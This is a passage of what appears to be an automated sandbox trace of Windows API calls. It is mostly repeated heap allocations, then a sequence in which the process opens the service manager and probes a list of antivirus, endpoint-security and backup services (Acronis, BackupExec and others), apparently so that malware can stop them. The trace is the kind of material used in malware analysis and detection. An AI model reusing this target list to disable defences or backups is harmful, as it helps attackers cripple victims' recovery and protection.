Size=0x88) returned 0x6826028 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.079] GetProcessHeap () returned 0xe30000 [0101.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.080] GetProcessHeap () returned 0xe30000 [0101.080] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.081] GetProcessHeap () returned 0xe30000 [0101.081] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68257b8 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68257b8 | out: hHeap=0xe30000) returned 1 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0101.082] GetProcessHeap () returned 0xe30000 [0101.082] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825698 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825698 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825728 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.083] GetProcessHeap () returned 0xe30000 [0101.083] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826268 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826268 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f98 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f98 | out: hHeap=0xe30000) returned 1 [0101.084] GetProcessHeap () returned 0xe30000 [0101.084] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.084] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825b18 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825b18 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68258d8 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68258d8 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0101.085] GetProcessHeap () returned 0xe30000 [0101.085] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0101.086] GetProcessHeap () returned 0xe30000 [0101.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x681cb68 | out: hHeap=0xe30000) returned 1 [0101.086] GetProcessHeap () returned 0xe30000 [0101.086] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825a88 | out: hHeap=0xe30000) returned 1 [0101.087] GetProcessHeap () returned 0xe30000 [0101.087] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xefb5b0 | out: hHeap=0xe30000) returned 1 [0101.087] GetProcessHeap () returned 0xe30000 [0101.087] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6807db0 | out: hHeap=0xe30000) returned 1 [0101.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833900, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0x994) returned 0xa7c [0101.087] CloseHandle (hObject=0xa7c) returned 1 [0101.087] GetTickCount () returned 0x115bbbb [0101.087] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.088] OpenServiceW (hSCManager=0x6835478, lpServiceName="ARSM", dwDesiredAccess=0x2c) returned 0x0 [0101.088] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.088] GetTickCount () returned 0x115bbbb [0101.088] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.089] OpenServiceW (hSCManager=0x68352c0, lpServiceName="AVP", dwDesiredAccess=0x2c) returned 0x0 [0101.089] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.089] GetTickCount () returned 0x115bbbb [0101.089] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.089] OpenServiceW (hSCManager=0x6835400, lpServiceName="AcrSch2Svc", dwDesiredAccess=0x2c) returned 0x0 [0101.090] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.090] GetTickCount () returned 0x115bbca [0101.090] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.091] OpenServiceW (hSCManager=0x6835428, lpServiceName="Acronis VSS Provider", dwDesiredAccess=0x2c) returned 0x0 [0101.091] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.091] GetTickCount () returned 0x115bbca [0101.091] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.091] OpenServiceW (hSCManager=0x68353b0, lpServiceName="AcronisAgent", dwDesiredAccess=0x2c) returned 0x0 [0101.091] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.092] GetTickCount () returned 0x115bbca [0101.092] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.092] OpenServiceW (hSCManager=0x68353b0, lpServiceName="AcronixAgent", dwDesiredAccess=0x2c) returned 0x0 [0101.092] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.092] GetTickCount () returned 0x115bbca [0101.092] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.093] OpenServiceW (hSCManager=0x6835478, lpServiceName="Antivirus", dwDesiredAccess=0x2c) returned 0x0 [0101.093] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.093] GetTickCount () returned 0x115bbca [0101.093] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.093] OpenServiceW (hSCManager=0x6835400, lpServiceName="BackupExecAgentAccelerator", dwDesiredAccess=0x2c) returned 0x0 [0101.094] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.094] GetTickCount () returned 0x115bbca [0101.094] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.094] OpenServiceW (hSCManager=0x6835360, lpServiceName="BackupExecAgentBrowser", dwDesiredAccess=0x2c) returned 0x0 [0101.094] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.095] GetTickCount () returned 0x115bbca [0101.095] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.095] OpenServiceW (hSCManager=0x6835248, lpServiceName="BackupExecDeviceMediaService", dwDesiredAccess=0x2c) returned 0x0 [0101.095] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.095] GetTickCount () returned 0x115bbca [0101.095] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.096] OpenServiceW (hSCManager=0x68353d8, lpServiceName="BackupExecJobEngine", dwDesiredAccess=0x2c) returned 0x0 [0101.096] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.096] GetTickCount () returned 0x115bbca [0101.096] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.096] OpenServiceW (hSCManager=0x6835400, lpServiceName="BackupExecManagementService", dwDesiredAccess=0x2c) returned 0x0 [0101.097] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.097] GetTickCount () returned 0x115bbca [0101.097] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.097] OpenServiceW (hSCManager=0x68353b0, lpServiceName="BackupExecRPCService", dwDesiredAccess=0x2c) returned 0x0 [0101.097] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.097] GetTickCount () returned 0x115bbca [0101.098] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.098] OpenServiceW (hSCManager=0x6835270, lpServiceName="BackupExecVSSProvider", dwDesiredAccess=0x2c) returned 0x0 [0101.098] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.098] GetTickCount () returned 0x115bbca [0101.098] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.099] OpenServiceW (hSCManager=0x6835478, lpServiceName="DCAgent", dwDesiredAccess=0x2c) returned 0x0 [0101.099] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.099] GetTickCount () returned 0x115bbca [0101.099] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.099] OpenServiceW (hSCManager=0x68353b0, lpServiceName="DbxSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.108] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.108] GetTickCount () returned 0x115bbda [0101.108] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835428 [0101.109] OpenServiceW (hSCManager=0x6835428, lpServiceName="EPSecurityService", dwDesiredAccess=0x2c) returned 0x0 [0101.109] CloseServiceHandle (hSCObject=0x6835428) returned 1 [0101.109] GetTickCount () returned 0x115bbda [0101.109] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.109] OpenServiceW (hSCManager=0x68353d8, lpServiceName="EPUpdateService", dwDesiredAccess=0x2c) returned 0x0 [0101.110] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.110] GetTickCount () returned 0x115bbda [0101.110] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68351f8 [0101.110] OpenServiceW (hSCManager=0x68351f8, lpServiceName="ESHASRV", dwDesiredAccess=0x2c) returned 0x0 [0101.110] CloseServiceHandle (hSCObject=0x68351f8) returned 1 [0101.110] GetTickCount () returned 0x115bbda [0101.111] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.111] OpenServiceW (hSCManager=0x6835220, lpServiceName="EhttpSrv", dwDesiredAccess=0x2c) returned 0x0 [0101.111] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.111] GetTickCount () returned 0x115bbda [0101.111] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.112] OpenServiceW (hSCManager=0x68353d8, lpServiceName="Enterprise Client Service", dwDesiredAccess=0x2c) returned 0x0 [0101.112] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.112] GetTickCount () returned 0x115bbda [0101.112] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.112] OpenServiceW (hSCManager=0x6835360, lpServiceName="EraserSvc11710", dwDesiredAccess=0x2c) returned 0x0 [0101.112] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.113] GetTickCount () returned 0x115bbda [0101.113] OpenSCManagerA 